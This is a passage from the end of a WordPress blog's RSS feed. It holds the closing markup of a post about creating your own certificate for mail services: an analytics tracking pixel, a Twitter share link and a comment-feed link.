<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2590%25d7%2599%25d7%259a-%25d7%2590%25d7%25a4%25d7%25a9%25d7%25a8-%25d7%259c%25d7%2599%25d7%2599%25d7%25a6%25d7%25a8-%25d7%259c%25d7%25a2%25d7%25a6%25d7%259e%25d7%259a-certificate-%25d7%259c%25d7%25a9%25d7%2599%25d7%25a8%25d7%2595%25d7%25aa%25d7%2599-mail&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%90%D7%99%D7%9A+%D7%90%D7%A4%D7%A9%D7%A8+%D7%9C%D7%99%D7%99%D7%A6%D7%A8+%D7%9C%D7%A2%D7%A6%D7%9E%D7%9A+Certificate+%D7%9C%D7%A9%D7%99%D7%A8%D7%95%D7%AA%D7%99+MAIL%3F+http://bit.ly/9OBTVz" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%90%d7%99%d7%9a-%d7%90%d7%a4%d7%a9%d7%a8-%d7%9c%d7%99%d7%99%d7%a6%d7%a8-%d7%9c%d7%a2%d7%a6%d7%9e%d7%9a-certificate-%d7%9c%d7%a9%d7%99%d7%a8%d7%95%d7%aa%d7%99-mail/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
	</channel>
</rss>
